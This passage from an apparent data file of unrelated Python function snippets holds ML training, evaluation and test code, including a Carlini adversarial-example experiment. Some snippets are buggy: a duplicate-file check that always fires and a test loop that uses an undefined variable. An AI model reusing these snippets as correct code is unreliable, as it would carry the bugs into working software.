len(mean_energy))):\n # train_data.append(0)\n\n # train_file = open(txt_file)\n\n # for line in train_file:\n # index1 = int((int(line[4]) * 600) + ((int(line[5]) * 60) + (int(line[7]) * 10) + int(line[8])) / 2)\n # index2 = int((int(line[10]) * 600) + ((int(line[11]) * 60) + (int(line[13]) * 10) + int(line[14])) / 2)\n # if line[0] == 'F':\n # train_data[index1] = 1\n # train_data[index2] = 1\n\n # with open(os.path.join(csv_path, 'train.csv'), 'w', newline='') as csv_file:\n # writer = csv.writer(csv_file)\n # writer.writerow(['Time Interval', 'Micro-expressions', 'Blinks',\n # 'Mean Energy', 'Max Pitch Amplitude', 'Vowel Duration', 'Fundamental Frequency',\n # 'False/True'])\n\n # # for cases where one parameter has more elements than another\n # for index in range(min(len(mean_energy), len(blink_data), len(microexpression_data))):\n # writer.writerow([index, microexpression_data[index], blink_data[index],\n # mean_energy[index], max_pitch_amp[index], vowel_duration[index], pitch_contour[index],\n # train_data[index]])\n\n # finalresults = [['Time Interval', 'Micro-expressions', 'Blinks',\n # 'Mean Energy', 'Max Pitch Amplitude', 'Vowel Duration', 'Fundamental Frequency' ]]\n final_results = []\n\n for index in range((min(len(mean_energy), len(blink_data), len(microexpression_data)))):\n final_results.append([microexpression_data[index], blink_data[index],\n mean_energy[index], max_pitch_amp[index], vowel_duration[index],\n pitch_contour[index]])\n\n prediction[0] = predict(final_results)\n\n return render_template('analysis.html', mean_energy=mean_energy, max_pitch_amp=max_pitch_amp,\n vowel_duration=vowel_duration, pitch_contour=pitch_contour, blink_data=blink_data,\n microexpression_data=microexpression_data, emotion_data=emotion_data)", "def define_model(model):\n global log_data_likelihood, log_priors, num_params, file_labels, labels, prior_xs, prior_pdfs\n num_prior_pts = 1001\n pic50_lower = -4.\n pic50_upper = 14.\n hill_lower = 0.\n hill_upper = 6.\n if model == 1:\n num_params = 2\n log_data_likelihood = log_data_likelihood_model_1_capped\n log_priors = log_priors_model_1\n labels = [r\"$pIC50$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0], loc=mu, scale=s),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower),[0,0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n st.gamma.pdf(prior_xs[1], sigma_shape, loc=sigma_loc, scale=sigma_scale)]\n elif model == 2:\n num_params = 3\n log_data_likelihood = log_data_likelihood_model_2_capped\n log_priors = log_priors_model_2\n labels = [r\"$pIC50$\", r\"$Hill$\", r\"$\\sigma$\"]\n file_labels = ['pIC50','Hill','sigma']\n #prior_xs = [np.linspace(pic50_lower, pic50_upper, num_prior_pts),\n # np.linspace(hill_lower, hill_upper, num_prior_pts),\n # np.linspace(sigma_uniform_lower,sigma_uniform_upper,num_prior_pts)]\n prior_xs = [np.linspace(pic50_exp_lower-2, pic50_exp_lower+23, num_prior_pts),\n np.concatenate(([hill_uniform_lower-2,hill_uniform_lower],\n np.linspace(hill_uniform_lower, 
hill_uniform_upper, num_prior_pts),\n [hill_uniform_upper,hill_uniform_upper+2])),\n np.linspace(0, 25, num_prior_pts)]\n #prior_pdfs = [st.logistic.pdf(prior_xs[0],loc=mu,scale=s),\n # st.fisk.pdf(prior_xs[1],c=beta,scale=alpha),\n # np.ones(num_prior_pts)/(1.*sigma_uniform_upper-sigma_uniform_lower)]\n #prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n # np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n # np.concatenate(([0, 0], np.ones(num_prior_pts) / (1. * sigma_uniform_upper - sigma_uniform_lower), [0, 0]))]\n prior_pdfs = [st.expon.pdf(prior_xs[0], loc=pic50_exp_lower, scale=pic50_exp_scale),\n np.concatenate(([0,0],np.ones(num_prior_pts) / (1. * hill_uniform_upper - hill_uniform_lower),[0,0])),\n st.gamma.pdf(prior_xs[2], sigma_shape, loc=sigma_loc, scale=sigma_scale)]", "def test_linear_ranking_model_save(self):\n feature_config_path = os.path.join(self.root_data_dir, \"configs/linear_model\", self.feature_config_fname)\n self.load_model_config(os.path.join(self.root_data_dir, \"configs/linear_model\", \"model_config.yaml\"))\n feature_config: FeatureConfig = FeatureConfig.get_instance(\n tfrecord_type=self.args.tfrecord_type,\n feature_config_dict=self.file_io.read_yaml(feature_config_path),\n logger=self.logger,\n )\n\n ranking_model: RankingModel = self.get_ranking_model(\n loss_key=self.args.loss_key,\n feature_config=feature_config,\n metrics_keys=[\"MRR\"]\n )\n ranking_dataset = RelevanceDataset(\n data_dir=os.path.join(self.root_data_dir, \"tfrecord\"),\n data_format=\"tfrecord\",\n feature_config=feature_config,\n tfrecord_type=self.args.tfrecord_type,\n max_sequence_size=self.args.max_sequence_size,\n batch_size=self.args.batch_size,\n preprocessing_keys_to_fns={},\n train_pcent_split=self.args.train_pcent_split,\n val_pcent_split=self.args.val_pcent_split,\n test_pcent_split=self.args.test_pcent_split,\n use_part_files=self.args.use_part_files,\n parse_tfrecord=True,\n file_io=self.file_io,\n logger=self.logger,\n )\n ranking_model.build(ranking_dataset)\n\n # Save the model and check if coefficients file was saved\n ranking_model.save(models_dir=self.args.models_dir)\n assert os.path.exists(os.path.join(self.args.models_dir, \"coefficients.csv\"))\n\n # Check coefficients for all features were saved\n coefficients_df = pd.read_csv(\n os.path.join(self.args.models_dir, \"coefficients.csv\"))\n train_features = set(feature_config.get_train_features(\"node_name\"))\n\n # Adding +1 to account for bias term\n assert len(train_features) + 1 == coefficients_df.shape[0]\n for train_feature in train_features:\n assert train_feature in coefficients_df.feature.values", "def test_readers_remeber_spawned_spectra(self):\n pass", "def verifyModels(self):\r\n\r\n #\r\n # now check that all models have the same poly data in the\r\n # model node as in the display node\r\n #\r\n polyDataInScene = []\r\n fileNamesInScene = []\r\n success = True\r\n numModels = slicer.mrmlScene.GetNumberOfNodesByClass( \"vtkMRMLModelNode\" )\r\n for n in range(numModels):\r\n modelNode = slicer.mrmlScene.GetNthNodeByClass( n, \"vtkMRMLModelNode\" )\r\n polyDataInScene.append(modelNode.GetPolyData())\r\n for dn in range(modelNode.GetNumberOfDisplayNodes()):\r\n displayNode = modelNode.GetNthDisplayNode(dn)\r\n if modelNode.GetPolyData() != displayNode.GetInputPolyData():\r\n self.delayDisplay(\"Model %d does not match its display node %d! 
(name: %s, ids: %s and %s)\" % (n,dn,modelNode.GetName(), modelNode.GetID(),displayNode.GetID()))\r\n success = False\r\n for sn in range(modelNode.GetNumberOfStorageNodes()):\r\n storageNode = modelNode.GetNthStorageNode(sn)\r\n fileName = storageNode.GetFileName()\r\n fileNamesInScene.append(fileName)\r\n if fileName in fileNamesInScene:\r\n self.delayDisplay(\"Model %d has duplicate file name %s! (ids: %s and %s)\" % (n,fileName,modelNode.GetID(),storageNode.GetID()))\r\n success = False\r\n\r\n\r\n #\r\n # now check that each model has a unique polydata\r\n #\r\n for n in range(numModels):\r\n modelNode = slicer.mrmlScene.GetNthNodeByClass( n, \"vtkMRMLModelNode\" )\r\n if polyDataInScene.count(modelNode.GetPolyData()) > 1:\r\n self.delayDisplay(\"Polydata for Model is duplicated! (id: %s and %s)\" % (n,modelNode.GetID()))\r\n success = False\r\n\r\n return success", "def test_02_train(self):\n today = date.today()\n log_file = os.path.join(LOG_DIR, \"{}-train-{}-{}.log\".format(LOG_PREFIX, today.year, today.month))\n \n ## update the log\n country = 'india'\n date_range = ('2017-11-29', '2019-05-24')\n metric = {'rmse':0.5}\n runtime = \"00:00:01\"\n model_version = 0.1\n model_version_note = \"test model\"\n \n update_train_log(country, date_range, metric, runtime,\n model_version, model_version_note ,test=True, prefix=LOG_PREFIX)\n\n df = pd.read_csv(log_file)\n logged_metric = [literal_eval(i) for i in df['metric'].copy()][-1]\n self.assertEqual(metric,logged_metric)", "def test_one_epoch_model(self, model: nn.Module) -> Tuple[float, Dict[str, float]]:\n losses = []\n l1_criterion = nn.L1Loss()\n model.eval()\n\n # testloaders contain same length(iteration) of batch dataset\n for sample_batched in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n image = torch.autograd.Variable(sample_batched['image'].cuda())\n depth = torch.autograd.Variable(sample_batched['depth'].cuda(non_blocking=True))\n maxDepth = 1000.0\n depth_n = maxDepth/depth\n #No use self.criterion \n\n output = self.model(image)\n # Compute the loss\n\n l_depth = l1_criterion(output, depth_n)\n\n l_ssim = torch.clamp((1 - ssim(output, depth_n, val_range = 1000.0 / 10.0)) * 0.5, 0, 1)\n\n loss = (1.0 * l_ssim) + (0.1 * l_depth)\n\n \n\n if self.half:\n images = images.half()\n\n # forward + backward + optimize\n \n self._count_correct_prediction(output, depth_n)\n losses.append(loss.item())\n\n avg_loss = sum(losses) / len(losses)\n acc = self._get_epoch_acc(is_test=True)\n return avg_loss, acc\n\n # # testloaders contain same length(iteration) of batch dataset\n # for data in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n # images, labels = data[0].to(self.device), data[1].to(self.device)\n\n # if self.half:\n # images = images.half()\n\n # # forward + backward + optimize\n # loss, outputs = self.criterion(model, images=images, labels=labels)\n # self._count_correct_prediction(outputs, labels)\n # losses.append(loss.item())\n\n # avg_loss = sum(losses) / len(losses)\n # acc = self._get_epoch_acc(is_test=True)\n # return avg_loss, acc", "def test_STLModelBuilder1(self):\n\n self.delayDisplay(\"Starting the test\")\n #\n # first, get some data\n #\n import SampleData\n SampleData.downloadFromURL(\n nodeNames='FA',\n fileNames='FA.nrrd',\n uris='http://slicer.kitware.com/midas3/download?items=5767')\n self.delayDisplay('Finished with download and loading')\n\n volumeNode = slicer.util.getNode(pattern=\"FA\")\n logic = STLModelBuilderLogic()\n # self.assertIsNotNone(logic.hasImageData(volumeNode))\n 
self.delayDisplay('Test passed!')", "def test_patches(args, model, device): \n if args.val_patches:\n test_path = config.data_path + '/val/original/'\n elif args.test_patches:\n test_path = config.data_path + '/test/original/'\n test_image_num = len([name for name in os.listdir(test_path)\n if os.path.isfile(os.path.join(test_path, name))]) // config.batch_size * config.batch_size\n\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar = 0.0, 0.0, 0.0, 0.0\n for start in range(0, test_image_num, config.batch_size):\n end = min(start + config.batch_size, test_image_num)\n if args.val_patches:\n test_original, test_style = load_test_dataset_patches('val', config.data_path, start, end,\n config.height * config.width * config.channels) \n elif args.test_patches:\n test_original, test_style = load_test_dataset_patches('test', config.data_path, start, end,\n config.height * config.width * config.channels)\n x = torch.from_numpy(test_original).float()\n y_real = torch.from_numpy(test_style).float()\n x = x.view(-1, config.height, config.width, config.channels).permute(0, 3, 1, 2).to(device)\n y_real = y_real.view(-1, config.height, config.width, config.channels).permute(0, 3, 1, 2).to(device)\n\n y_fake = model.gen_g(x)\n\n # Calculate PSNR & SSIM scores\n score_psnr += psnr(y_fake, y_real) * config.batch_size\n\n y_fake_np = y_fake.detach().cpu().numpy().transpose(0, 2, 3, 1)\n y_real_np = y_real.cpu().numpy().transpose(0, 2, 3, 1)\n temp_ssim, _ = compare_ssim(y_fake_np, y_real_np, multichannel=True, gaussian_weights=True, full=True)\n score_ssim_skimage += (temp_ssim * config.batch_size)\n\n temp_ssim, _ = ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5)\n score_ssim_minstar += temp_ssim * config.batch_size\n\n score_msssim_minstar += multi_scale_ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5) * config.batch_size\n print('PSNR & SSIM scores of {} images are calculated.'.format(end))\n\n score_psnr /= test_image_num\n score_ssim_skimage /= test_image_num\n score_ssim_minstar /= test_image_num\n score_msssim_minstar /= test_image_num\n print('PSNR : {:.4f}, SSIM_skimage : {:.4f}, SSIM_minstar : {:.4f}, SSIM_msssim: {:.4f}'.format(\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar))", "def test_active_inference_SPM_1b(self):", "def main():\n\n # Create model_dict from arguments\n model_dict = model_dict_create()\n\n # No. 
of deviations to consider\n no_of_mags = 50\n dev_list = np.linspace(0.1, 5.0, no_of_mags)\n\n # Load dataset specified in model_dict\n print('Loading data...')\n dataset = model_dict['dataset']\n if (dataset == 'MNIST'):\n X_train, y_train, X_val, y_val, X_test, y_test = load_dataset(model_dict)\n # rd_list = [None, 784, 331, 200, 100, 90, 80, 70, 60, 50, 40, 30, 20, 10]\n rd_list = [None, 331, 100, 80, 60, 40, 20]\n # rd_list = [None,784,100]\n elif dataset == 'GTSRB':\n X_train, y_train, X_val, y_val, X_test, y_test = load_dataset(model_dict)\n rd_list = [1024, 338, 200, 100, 90, 80, 70, 60, 50, 40, 33, 30, 20, 10]\n elif dataset == 'HAR':\n X_train, y_train, X_test, y_test = load_dataset(model_dict)\n # rd_list = [561, 200, 100, 90, 80, 70, 60, 50, 40, 30, 20, 10]\n rd_list = [561]\n X_val = None\n y_val = None\n\n mean = np.mean(X_train, axis=0)\n X_train -= mean\n X_test -= mean\n if (dataset == 'MNIST') or (dataset == 'GTSRB'): X_val -= mean\n\n # fig, ax = plt.subplots(nrows=1, ncols=1)\n\n # for rd in rd_list:\n # model_setup_carlini(model_dict, X_train, y_train, X_test, y_test, X_val, y_val, mean, rd, ax)\n\n partial_carlini = partial(model_setup_carlini, model_dict=model_dict, X_train=X_train, y_train=y_train, X_test=X_test, y_test=y_test, X_val=X_val, y_val=y_val,\n mean=mean)\n pool=multiprocessing.Pool(processes=8)\n pool.map(partial_carlini,rd_list,1)\n pool.close()\n pool.join()\n\n # dim_red = model_dict['dim_red']\n # plt.legend()\n # plt.savefig('carlini_l2_hist_'+dim_red+'.png')", "def test_svd_smoothing_alt(self):\n \t\t\n\t\tprint(\"----test_svd_smoothing_alt-----\")\n\n\t\t# need model here; somehow self.model it gets corrupted by SVD smoothing\n\t\t#model = models.vgg11(pretrained=True)\n\t\t\n\t\tself.watcher.SVDSmoothing(layers=[self.fc2_layer], percent=-0.2)\n\t\tesd = self.watcher.get_ESD(layer=self.fc2_layer) \n\t\tnum_comps = len(esd[esd>10**-10])\n\t\t# 3277 = 4096 - 819\n\t\tprint(\"num comps = {}\".format(num_comps))\n\t\tself.assertEqual(num_comps, 3277)", "def test_rm500(self):\n\t\tmy_test_file = \"/\".join([os.path.dirname(sys.modules[\"cancerscope\"].__file__), \"../tests/data/test_tcga.txt\"])\n\t\tscope_ensemble_obj = cancerscope.scope()\n\t\ttest_X = scope_ensemble_obj.load_data(my_test_file) # X, samples, features_test, in_genecode\n\t\t## Get the model of interest\n\t\tmodel_name = \"v1_rm500\"\n\t\tmodel_in = \"\"\n\t\tquery_localdirs = cancerscope.get_models.findmodel(os.path.dirname(cancerscope.__file__), model_name)\n\t\tif query_localdirs is not None:\n\t\t\tmodel_in = query_localdirs[model_name]\n\t\telse:\n\t\t\tmodel_in = cancerscope.get_models.downloadmodel(model_label=model_name)\n\t\tself.assertTrue(os.path.isdir(model_in))\n\t\tself.assertTrue(os.path.exists(\"\".join([model_in, \"/lasagne_bestparams.npz\"])))\n\t\t\"\"\"Test if model can be setup correctly\"\"\"\n\t\tlmodel = cancerscope.scopemodel(model_in)\n\t\tlmodel.fit()\n\t\tself.assertEqual(len(lmodel.features), 17688)\n\t\tx_input = lmodel.prepare_input_featorders(X=test_X[0], x_features_genecode = test_X[3], x_features=test_X[2])\n\t\t\"\"\"Test if it predicts properly\"\"\"\n\t\tallpreds_names = lmodel.predict(x_input, get_all_predictions=True,get_numeric=False, get_predictions_dict=False)\n\t\tallpreds_values = lmodel.predict(x_input, get_all_predictions=True,get_numeric=True, get_predictions_dict=False)\n\t\ttoppreds_names = lmodel.predict(x_input, get_all_predictions=False,get_numeric=False, get_predictions_dict=False)\n\t\ttoppreds_values = lmodel.predict(x_input, 
get_all_predictions=False,get_numeric=True, get_predictions_dict=False)\n\t\ttoppreds_df = lmodel.predict(x_input, get_all_predictions=True,get_numeric=False, get_predictions_dict=True)\n\t\tself.assertEqual(len(allpreds_names[0]), 66); self.assertEqual(len(allpreds_names[1]), 66); \n\t\tself.assertEqual(allpreds_values.shape[1],66); \n\t\tself.assertAlmostEqual(allpreds_values[0][1], 0.003065253372039)\n\t\tself.assertEqual(toppreds_names[0], \"PAAD_TS\"); self.assertEqual(toppreds_names[1], \"HNSC_TS\")\n\t\tself.assertAlmostEqual(toppreds_values[0],0.20889836023919614, 6, 0.000001); self.assertAlmostEqual(toppreds_values[1], 0.44416348623870444, 6, 0.000001)\n\t\t#self.assertEqual(round(toppreds_values[0],12), round(0.208874390780809,12)); self.assertEqual(round(toppreds_values[1],12), round(0.444162763077693,12))\n\t\tself.assertEqual(toppreds_df[0][0][0], toppreds_names[0]); self.assertAlmostEqual(float(toppreds_df[0][0][1]), toppreds_values[0]); \n\t\tself.assertEqual(toppreds_df[1][0][0], toppreds_names[1]); self.assertAlmostEqual(float(toppreds_df[1][0][1]), toppreds_values[1])", "def test(model, dataloader):\n model.eval()\n device = model.device\n time_start = time.time()\n batch_time = 0.0\n accuracy = 0.0\n all_prob, all_labels = [], []\n \n with torch.no_grad():\n for (batch_seqs, batch_seq_masks, batch_seq_segments, batch_labels) in dataloader:\n batch_start = time.time()\n seqs = batch_seqs.to(device) \n masks = batch_seq_masks.to(device)\n segments = batch_seq_segments.to(device)\n labels = batch_labels.to(device)\n\n _, _, probabilities = model(seqs, masks, segments, labels)\n accuracy += correct_predictions(probabilities, labels)\n batch_time += time.time() - batch_start\n all_prob.extend(probabilities[:, 1].cpu().numpy())\n all_labels.extend(batch_labels)\n batch_time /= len(dataloader)\n total_time = time.time() - time_start\n accuracy /= (len(dataloader.dataset))\n return batch_time, total_time, accuracy, roc_auc_score(all_labels, all_prob)", "def actual_showcase(natural, isTest):\n\tmax_cells = 31\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tif isTest:\n\t\t\tmidfix = \"test\"\n\t\telse:\n\t\t\tmidfix = \"train\"\n\n\t\tif natural:\n\t\t\tif isTest:\n\t\t\t\tloader = nat_test_loader\n\t\t\t\tglobal len_test_nat\n\t\t\t\tlen_test_nat = len(nat_test_loader)\n\t\t\telse:\n\t\t\t\tloader = nat_train_loader\n\t\t\tprefix = \"nat\"\n\t\telse:\n\t\t\tif isTest:\n\t\t\t\tloader = syn_test_loader\n\t\t\t\tglobal len_test_syn\n\t\t\t\tlen_test_syn = len(syn_train_loader)\n\t\t\telse:\n\t\t\t\tloader = syn_train_loader\n\t\t\tprefix = \"syn\"\n\n\t\tlog_sam_train_file = open(directory + \"/showcase/sam_train_log.txt\", \"a\")\n\t\tlog_sam_test_file = open(directory + \"/showcase/sam_test_log.txt\", \"a\")\n\t\tlog_file = open(directory + \"/showcase/values.txt\", \"a\")\n\n\t\tccs = []\n\t\tlabls = []\n\t\t#file_names = []\n\t\tnum_unlabeled = 0\n\t\toccurrences = np.zeros(max_cells)\n\t\tbar_corrects = np.zeros(max_cells)\n\t\tbar_maes = np.zeros(max_cells)\n\t\tbar_devs = np.zeros(max_cells)\n\t\tfor batch_idx, (data, labels) in enumerate(loader): # , file_batch)\n\t\t\tfor l in labels:\n\t\t\t\toccurrences[l] += 1\n\t\t\t\tif prefix == \"nat\" and l == 0:\n\t\t\t\t\toccurrences[l] -= 1\n\n\t\t\tdata = data.cuda()\n\t\t\tlabels = labels.float().cuda()\n\n\t\t\tmodel.mode = 'natural' if natural else 'synth'\n\t\t\trecon_batch, mu, logvar, cc = model(data)\n\n\t\t\tcc[labels == 0] = 0 # Sets the counted cells to 0 for unlabeled data, so that 
regressor_loss=0\n\t\t\tnum_unlabeled += (labels == 0).sum()\n\t\t\t_, _, _ = loss_function(recon_batch, data, mu, logvar, cc, labels, natural)\n\n\t\t\tccs.append(cc.cpu().detach().numpy())\n\t\t\tlabls.append(labels.cpu().detach().numpy())\n\t\t\t#for file in file_batch:\n\t\t\t\t#file_names.append(file)\n\n\t\tpreds = np.concatenate(ccs, axis=None) # elementwise round of cc\n\t\tlbls = np.concatenate(labls, axis=None) # elementswise round of labels\n\n\t\t# Optional: Draw label and prediction onto result images\n\t\t\"\"\"for i in range(len(lbls)):\n\t\t\tif lbls[i] != 0:\n\t\t\t\timg = Image.open(file_names[i]).convert('RGB')\n\t\t\t\timg = img.resize((img.width * 4, img.width * 4), Image.NEAREST)\n\t\t\t\tmode = img.mode\n\t\t\t\tnew_img = Image.new(mode, (256, 292))\n\t\t\t\tnew_img.paste(img, (0, 36, 256, 292))\n\t\t\t\tdraw = ImageDraw.Draw(new_img)\n\t\t\t\tfont = ImageFont.truetype(\"arial.ttf\", 32)\n\t\t\t\tdraw.text((4, 0), \"P: \" + str(np.round(preds[i],2)), (255, 255, 255), font=font)\n\t\t\t\tdraw.text((128, 0), \"L: \" + str(lbls[i]), (255, 255, 255), font=font)\n\t\t\t\tnew_img.save(directory + \"/showcase/\" + prefix + \"_sample\" + str(i) + \".jpg\")\"\"\"\n\n\t\tpred_log = []\n\t\tlbl_log = []\n\t\t# filename_log = []\n\t\tfor x in range(len(lbls)):\n\t\t\tif lbls[x] != 0:\n\t\t\t\t# filename_log.append(str(file_names[x]))\n\t\t\t\tpred_log.append(str(np.round(preds[x], 2)))\n\t\t\t\tlbl_log.append(str(lbls[x]))\n\t\t# log_data_file.write(str(filename_log))\n\t\tif midfix == \"train\":\n\t\t\tlog_sam_train_file.write(str(pred_log) + \"\\n\" + str(lbl_log) + \"\\n\")\n\t\telse:\n\t\t\tlog_sam_test_file.write(str(pred_log) + \"\\n\" + str(lbl_log) + \"\\n\")\n\t\t# log_data_file.write(str(file_names))\n\t\t# log_sam_file.write(str(np.round(preds[preds != 0], 2)) + \"\\n\" + str(lbls[lbls != 0]) + \"\\n\")\n\t\tpreds = np.around(preds)\n\n\t\tcorrect = np.sum(preds == lbls) # Count elementwise equality of preds and lbls\n\t\tlen_set = len(loader.dataset)\n\t\tcorrect -= num_unlabeled # Remove zero_indices from numerator\n\t\tcorrect = float(correct) / float(len_set - num_unlabeled) # Remove zero_indices from denominator\n\n\t\tdist_sum = np.sum(np.abs(np.subtract(preds, lbls))) # Elementwise addition of dist between predictions and labels\n\t\tMAE = dist_sum / float(len_set - num_unlabeled)\n\n\t\tlen_labeled = float(len_set - num_unlabeled)\n\t\tdev = np.ones(len_set) - np.divide(preds, lbls) # Deviation contains NaNs because syn data has lbl=0\n\t\tavg_dev = np.sum(np.abs(np.where(np.isnan(dev), 0, dev))) / len_labeled # Rake the avg only of those deviations that weren't NaN\n\n\t\tlog_file.write(prefix + \" \" + midfix + \" correct is: \" + str(correct) + \"\\n\")\n\t\tlog_file.write(prefix + \" \" + midfix + \" MAE is: \" + str(MAE) + \"\\n\")\n\t\tlog_file.write(prefix + \" \" + midfix + \" DEV is: \" + str(avg_dev) + \"\\n\")\n\n\t\tlog_file.close()\n\n\t\tfor i in range(0,len(preds)):\n\t\t\tif lbls[i] == 0:\n\t\t\t\tcontinue\n\t\t\tif preds[i] == lbls[i]:\n\t\t\t\tbar_corrects[int(lbls[i])] += 1\n\t\t\tbar_maes[int(lbls[i])] += np.abs(preds[i]-lbls[i])\n\t\t\tbar_devs[int(lbls[i])] += np.abs(1-(preds[i]/lbls[i]))\n\n\t\tbar_corrects = np.multiply(np.divide(bar_corrects,occurrences), 100)\n\t\tbar_maes = np.divide(bar_maes, occurrences)\n\t\tbar_devs = np.divide(bar_devs, occurrences)\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0,max_cells)), y=bar_corrects)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" % correct\", 
xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"% correct\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_correct.html\", auto_open=False) # Includes fig.show()\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0, max_cells)), y=bar_maes)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" MAE\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"MAE\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_MAE.html\", auto_open=False) # Includes fig.show()\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0, max_cells)), y=bar_devs)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" DEV\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"DEV\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_DEV.html\", auto_open=False) # Includes fig.show()\n\n\t\tfig = go.Figure([go.Bar(x=list(range(0, max_cells)), y=occurrences)])\n\t\tfig.update_layout(\n\t\t\ttitle=go.layout.Title(text=prefix + \" \" + midfix + \" occurrences\", xref=\"paper\", x=0),\n\t\t\txaxis=go.layout.XAxis(title=go.layout.xaxis.Title(text=\"# cells in image\", )),\n\t\t\tyaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text=\"# images with that cell count\", ))\n\t\t)\n\t\tplotly.offline.plot(fig, filename=directory + \"/showcase/\" + prefix + \"_\" + midfix + \"_proportion.html\", auto_open=False) # Includes fig.show()", "def utest_SGD_Test():\n model_fname = \"../work/model\"\n # test binary classification.\n if False:\n #test_fname = \"../work/train.bz2\"\n test_fname = \"../work/rcv1_test.binary.bz2\"\n if True:\n test_fname = \"../work/iris_multi.train\"\n test_logreg(model_fname,test_fname,prob=True,acc=True)\n pass", "def test_machine_learning():", "def test_lrp_svm(self, syn_genomic_data, syn_fm, syn_idx, rep, tmp_path, syn_true_pvalues): \n rep_to_plot = 0\n ttbrs = [0.5, 1,1.5]\n idx = syn_idx[str(rep_to_plot)]\n fig, axes = plt.subplots(len(ttbrs), 5, figsize=[30,15])\n x_3d = syn_fm(\"3d\")[str(rep_to_plot)][:]\n x_2d = syn_fm(\"2d\")[str(rep_to_plot)][:]\n indices_true= [inds_true for inds_true, x in enumerate(syn_true_pvalues[0].flatten()) if x]\n\n for i, ttbr in enumerate(ttbrs):\n print('Using tbrr={}'.format(ttbr))\n labels = generate_syn_phenotypes(tower_to_base_ratio=ttbr, quantity=rep)\n labels_cat = {}\n for key, l in labels.items():\n labels_cat[key] = tensorflow.keras.utils.to_categorical((l+1)/2)\n \n best_params_montaez['n_snps']= x_3d.shape[1]\n \n l_0b=labels_cat[str(rep_to_plot)]\n\n model = create_montaez_dense_model(best_params_montaez)\n y_integers = np.argmax(l_0b[idx.train], axis=1)\n class_weights = class_weight.compute_class_weight('balanced', np.unique(y_integers), y_integers)\n d_class_weights = dict(enumerate(class_weights))\n\n model.fit(x=x_3d[idx.train], y=l_0b[idx.train], validation_data=(x_3d[idx.test], l_0b[idx.test]), epochs=best_params_montaez['epochs'], class_weight=d_class_weights, callbacks=[ ReduceLROnPlateau(monitor='val_loss', factor=best_params_montaez['factor'], 
patience=best_params_montaez['patience'], mode='min'),],)\n\n model = iutils.keras.graph.model_wo_softmax(model)\n analyzer = innvestigate.analyzer.LRPAlpha1Beta0(model)\n weights = analyzer.analyze(x_3d).sum(0)\n\n top_indices_sorted, filtered_weights = postprocess_weights(weights, top_k, filter_window_size, p_svm, p_pnorm_filter)\n\n complete_pvalues = chi_square(syn_genomic_data[str(rep_to_plot)][:], labels[str(rep_to_plot)])\n \n pvalues_filled_deep = np.ones(n_total_snps)\n pvalues_filled_deep[top_indices_sorted] = complete_pvalues[top_indices_sorted]\n\n # Plot RPVT\n plot_pvalues(complete_pvalues, indices_true, axes[i][0])\n if i==0:\n axes[i][0].set_title('RPVT $-log_{10}$(p-values)', fontsize=22)\n axes[i][0].set_ylabel('$-log_{10}$(p-value)', fontsize=18)\n plt.setp(axes[i][0].get_yticklabels(), fontsize=16)\n plt.setp(axes[i][0].get_xticklabels(), fontsize=16)\n\n # Plot svm weights \n clf = LinearSVC(penalty='l2', loss='hinge', C=0.0022, dual=True, tol=1e-3, verbose=0, class_weight='balanced')\n idx_now, pvalues, raw_weights = combi_method(clf, syn_genomic_data[str(rep_to_plot)][:],x_2d, labels[str(rep_to_plot)], 35, 2, 2, 30)\n #filtered_svm_weights = postprocess_weights_without_avg(raw_weights, p_svm)\n pvalues_filled_combi = np.ones(len(complete_pvalues))\n pvalues_filled_combi[idx_now] = pvalues\n #svm_weights = toy_classifier.fit(x_2d, labels[str(rep_to_plot)]).coef_\n axes[i][1].scatter(range(len(np.absolute(raw_weights).sum(1))), 1000*np.absolute(raw_weights).sum(1), marker='.', color='darkblue')\n axes[i][1].scatter(indices_true,1000*np.absolute(raw_weights).sum(1)[indices_true], color='fuchsia')\n 